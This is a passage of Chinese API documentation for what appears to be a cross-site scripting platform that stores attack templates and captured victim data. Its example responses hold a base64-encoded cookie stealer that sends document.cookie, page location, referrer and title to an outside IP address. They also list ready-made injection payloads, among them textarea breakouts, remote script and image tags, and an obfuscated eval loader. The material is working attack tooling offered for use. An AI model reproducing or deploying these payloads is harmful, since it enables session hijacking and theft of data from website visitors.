"headers": "eydDb250ZW50LUxlbmd0aCc6ICcnLCAnQ29udGVudC1UeXBlJzogJ3RleHQvcGxhaW4nLCAnSG9zdCc6ICcxMDEuMzcuMTQuMTQ0Ojg4ODgnLCAnVXNlci1BZ2VudCc6ICdNb3ppbGxhLzUuMCAoTWFjaW50b3NoOyBJbnRlbCBNYWMgT1MgWCAxMF8xNV80KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvODcuMC40MjgwLjg4IFNhZmFyaS81MzcuMzYnLCAnQWNjZXB0JzogJ2ltYWdlL2F2aWYsaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLGltYWdlLyosKi8qO3E9MC44JywgJ0FjY2VwdC1FbmNvZGluZyc6ICdnemlwLCBkZWZsYXRlJywgJ0FjY2VwdC1MYW5ndWFnZSc6ICd6aC1DTix6aDtxPTAuOScsICdDb25uZWN0aW9uJzogJ2Nsb3NlJ30=",
"project_associated_file_name": "KE29b",
"ip": "142.3.56.28",
"full_url": "http://127.0.0.1:8888/a/KE29b/?location=file%3A///Users/user/Desktop/test.html&toplocation=file%3A///Users/user/Desktop/test.html&cookie=&opener=&referrer=&title=",
"creation_time": "1609233552",
"request_method": "GET",
"data_pack": "eydsb2NhdGlvbic6ICdmaWxlOi8vL1VzZXJzL3VzZXIvRGVza3RvcC90ZXN0Lmh0bWwnLCAndG9wbG9jYXRpb24nOiAnZmlsZTovLy9Vc2Vycy91c2VyL0Rlc2t0b3AvdGVzdC5odG1sJywgJ2Nvb2tpZSc6ICcnLCAnb3BlbmVyJzogJycsICdyZWZlcnJlcic6ICcnLCAndGl0bGUnOiAnJ30="
}],
"code": 200
}
- 返回参数解释
project_associated_file_data
项目文件完整内容,需要用base64解密the_first_use
第一个POCthe_second_use
第二个POCthe_third_use
第三个POCexploit_path
第四个POCcoding_exploit
第五个POC
- 403:嘿~宝贝这是非法查询哦(๑•̀ㅂ•́)و✧
- 404:你没有查询这个项目的权限哦宝贝~
- 500:请使用Post请求
读取默认跨站脚本模板数据
/api/read_default_cross_site_script_template/
用来跨站脚本中的默认数据有哪些
{
"token": ""
}
参数解释
token
登录后返回的token
返回状态码
- 169:呐呐呐!莎酱被玩坏啦(>^ω^<)
- 200:返回查询到的项目信息
{
"message": {
"project_associated_file_data": "dmFyIHggPSBuZXcgSW1hZ2UoKTsKdHJ5IHsKICAgIHZhciBteW9wZW5lciA9ICcnOwogICAgbXlvcGVuZXIgPSB3aW5kb3cub3BlbmVyICYmIHdpbmRvdy5vcGVuZXIubG9jYXRpb24gPyB3aW5kb3cub3BlbmVyLmxvY2F0aW9uOiAnJzsKfSBjYXRjaChlcnIpIHt9Cnguc3JjID0gJ2h0dHA6Ly8xMDEuMzcuMTQuMTQ0Ojg4ODgvYS9LRTI5Yi8/bG9jYXRpb249Jytlc2NhcGUoZG9jdW1lbnQubG9jYXRpb24pKycmdG9wbG9jYXRpb249Jytlc2NhcGUodG9wLmRvY3VtZW50LmxvY2F0aW9uKSsnJmNvb2tpZT0nK2VzY2FwZShkb2N1bWVudC5jb29raWUpKycmb3BlbmVyPScrZXNjYXBlKG15b3BlbmVyKSsnJnJlZmVycmVyPScrZXNjYXBlKGRvY3VtZW50LnJlZmVycmVyKSsnJnRpdGxlPScrZXNjYXBlKGRvY3VtZW50LnRpdGxlKTs=",
"the_first_use": "</tExtArEa>'\"><sCRiPt sRC=//127.0.0.1:1234/s/KE29b></sCrIpT>",
"the_second_use": "<sCRiPt/SrC=//127.0.0.1:1234/s/KE29b>",
"the_third_use": "<img sRC=//127.0.0.1:1234/s/KE29b>",
"exploit_path": "//127.0.0.1:1234/s/KE29b",
"coding_exploit": "</tEXtArEa>'\"><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22%2F%2F127.0.0.1:1234%2Fs%2FKE29b%22%2BMath.random%28%29%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//>"
},
"code": 200
}
- 返回参数解释会有多个数组的集合
file_name
文件名称file_data
文件数据,需要base64解密
- 403:嘿~宝贝这是非法查询哦(๑•̀ㅂ•́)و✧
- 500:请使用Post请求
读取用户自定义跨站脚本模板数据
/api/read_cross_site_script_template/
用来获取数据库中用户自定义的所有跨站脚本模板数据
{
"token": ""
}
参数解释
token
登录后返回的token
返回状态码
- 169:呐呐呐!莎酱被玩坏啦(>^ω^<)
- 200:返回查询到的项目信息
{
"message": [{
"file_name": "test.js",
"file_data": "YWxlcnQoInhzcyIpOw=="
}, {
"file_name": "get_cookie.js",
"file_data": "dmFyIHggPSBuZXcgSW1hZ2UoKTsKdHJ5IHsKICAgIHZhciBteW9wZW5lciA9ICcnOwogICAgbXlvcGVuZXIgPSB3aW5kb3cub3BlbmVyICYmIHdpbmRvdy5vcGVuZXIubG9jYXRpb24gPyB3aW5kb3cub3BlbmVyLmxvY2F0aW9uOiAnJzsKfSBjYXRjaChlcnIpIHt9Cnguc3JjID0gJ2h0dHA6Ly9pcC9hL+mhueebruaWh+S7tuWcsOWdgC8/bG9jYXRpb249Jytlc2NhcGUoZG9jdW1lbnQubG9jYXRpb24pKycmdG9wbG9jYXRpb249Jytlc2NhcGUodG9wLmRvY3VtZW50LmxvY2F0aW9uKSsnJmNvb2tpZT0nK2VzY2FwZShkb2N1bWVudC5jb29raWUpKycmb3BlbmVyPScrZXNjYXBlKG15b3BlbmVyKSsnJnJlZmVycmVyPScrZXNjYXBlKGRvY3VtZW50LnJlZmVycmVyKSsnJnRpdGxlPScrZXNjYXBlKGRvY3VtZW50LnRpdGxlKTs="
}],
"code": 200
}
- 返回参数解释会有多个数组的集合
template_name
模板名称template_data
模板数据,需要使用base64解密creation_time
模板创建时间update_time
模板更新时间
- 403:嘿~宝贝这是非法查询哦(๑•̀ㅂ•́)و✧
- 500:请使用Post请求
保存用户自定义跨站脚本模板数据
/api/save_cross_site_script_template/
用来生成用户自定义模板中的数据
{
"token": "",
"template_name":"",
"template_data":""
}
参数解释
token
登录后返回的tokentemplate_name
模板名template_data
模板数据
返回状态码
- 200:模板写入成功
- 403:嘿~宝贝这是非法查询哦(๑•̀ㅂ•́)و✧
- 169:呐呐呐!莎酱被玩坏啦(>^ω^<)
- 500:请使用Post请求
- 503:该模板已存在!
修改用户自定义跨站脚本模板数据
/api/modify_cross_site_script_template/
用来修改用户自定义的模板数据
{
"token": "",
"template_name":"",
"template_data":""
}
参数解释
token
登录后返回的tokentemplate_name
模板名template_data
模板数据
返回状态码
- 200:模板写入成功
- 403:嘿~宝贝这是非法查询哦(๑•̀ㅂ•́)و✧
- 404:不存在该模板哦宝贝~
- 169:呐呐呐!莎酱被玩坏啦(>^ω^<)
- 500:请使用Post请求
- 501:模板更新失败